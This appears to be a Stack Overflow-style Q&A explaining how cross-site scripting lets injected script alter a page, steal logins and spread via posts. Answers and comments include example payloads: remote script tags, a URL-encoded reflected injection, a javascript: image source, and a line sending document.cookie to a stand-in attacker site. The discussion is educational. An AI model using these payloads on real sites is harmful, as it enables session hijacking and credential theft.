# XSS: Rewrite the content of the HTML page?

Tags: html, http, security, xss

Regarding XSS, [OWASP states (intro paragraph):](https://www.owasp.org/index.php/Cross-site_Scripting_(XSS))

> These scripts can even rewrite the content of the HTML page

As a user, I cannot rewrite the contents of facebook.com (other than wall posts, comments, and so on). That would require me to permanently alter their html files, which clearly no user without specific server access can do.

When I cannot do it as a user, how can possibly a maliciously injected script from facebook.com, executed by my browser, rewrite the contents of facebook.com?

Answer (score 2, accepted):

> As a user, I cannot rewrite the contents of facebook.com

You could if Facebook didn't protect well against XSS.  Sites that don't escape user-generated text for usage in the context of HTML are vulnerable to having arbitrary script injected into the page.  Your Facebook post could contain a `<script>` tag, for example.

> That would require me to permanently alter their html files, which clearly no user without specific server access can do.

No, you could simply modify the page client-side once your malicious script is loaded.  No need to actually modify the original page to have the effect of wiping out the page.  For example:

```
document.body.innerHTML = '';
```

Comment: But, that only changes it for that specific user in his/her browser, not for everyone. As soon as you refresh the page, it is back to normal. No?

Comment: @Magnus It changes it for whomever the script is injected for.  If you refresh, and the injected script is loaded again, the malicious script runs again.

Comment: Right, but it is rather obvious that we can change the DOM for ourselves. We can even do that with just Chrome Dev Tools. Thus, it makes sense that a malicious script from origin A, executed by my browser, can change the DOM built from pages on origin A. But that would be gone as soon as I refresh my browser. How is changing the content useful to the attacker? Thanks for your help!

Comment: @Magnus The thing is, injected script may be from another origin.  Take your Facebook example.  Suppose Facebook were vulnerable to XSS and I made a post with something like `<script src="https://example.com/something-evil.js"></script>`.  Then, inside `something-evil.js`, I had code which would show a login dialog for Facebook, saying that the user had logged out.  Most people would happily fill in that dialog again, especially because the URL bar would say https://www.facebook.com.  Now, I can steal their passwords.  Or, maybe I make posts on their behalf instead.  Anything.

Comment: @Magnus A very common example are confirmation pages.  The URLs often take the form of `http://example.com/confirm.php?message=Your%20request%20has%20been%20accepted.`.  Well, what if someone then crafts a URL with something like `message=%3Cscript%20src%3D%22https%3A%2F%2Fexample.com%2Fevil.js%22%3E%3C%2Fscript%3E`?  It's no problem if the text is escaped for the context of HTML, as then the script tag will never be interpreted as a script tag.  Sadly, people think that this is some sort of a "security" thing alone, and don't escape ALL arbitrary text for HTML.

Comment: I see. By changing the content of the page, the hacker can trick the user into exposing his login credentials (or other sensitive input data). I mean, it is kind of content spoofing, right? Wouldn't make much harm to change facebook's blue to red (or other meaningless DOM changes).

Comment: @Magnus It can be *anything*... if you can inject a script into someone's page, you can completely control it and impersonate the user on that site.

Comment: Thanks again, Brad. I kind of got the general flow of XSS and how the malicious script can now do whatever the user can do. I was just trying to understand how changing the content of the page for just that one victim would be helpful to the attacker. It seemed more obvious to instead want to steal victim's cookie or otherwise send HTTP requests to server for sensitive data.

Comment: @Magnus Remember, it might not be just that one victim.  Again, in my Facebook example, anyone who sees that post gets infected.  Another example... imagine if I created an advertisement and ran it in a major ad network.  If that sort of thing wasn't protected (and in reality, stuck through piles of bloat and iframes), it would be possible to hijack.

Answer (score 2):

Let me give some example. Let's imagine Facebook lets its users to save a link to externally hosted avatar at user's profile. And this avatar is shown near user's nickname. Also let's imagine that Facebook does not protect itself against XSS (it really does, but we need this assumption).

Then the attacker can use such text instead of avatar link:

```
javascript:alert('You are hacked')
```

Facebook's HTML code displaying avatar may look as:

```
<img src="javascript:alert('You are hacked')"></img>
```

Then attacker will see that alert when he opens his profile. Doesn't look very dangerous, does it?

But take care: Facebook has a news feed. Let the attacker write some post - and all his friends will see the alert on their newsfeed page.

And to finalize: instead of `alert` the attacker will be able to get user's Facebook cookies and send them to attacker's site:

```
<script>window.location = 'attackerssite.com?cookie=' + document.cookie</script>
```

And then he'll collect victim's cookies from his server's access log. Now it is a real hazard, do you agree?

**Note**. Here I described [stored XSS](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting): it is probably the most dangerous type of XSS that can affect many users at once. The other types of XSS (described in other answers to this question) may affect current user - but that doesn't mean they are not dangerous: for example they can steal user's cookies as well.

Comment: Thanks Eugene. I actually got the general concept of stored, reflected, and DOM based XSS. I was more trying to understand how it is valuable to the hacker to change the content of t page, just for the victim.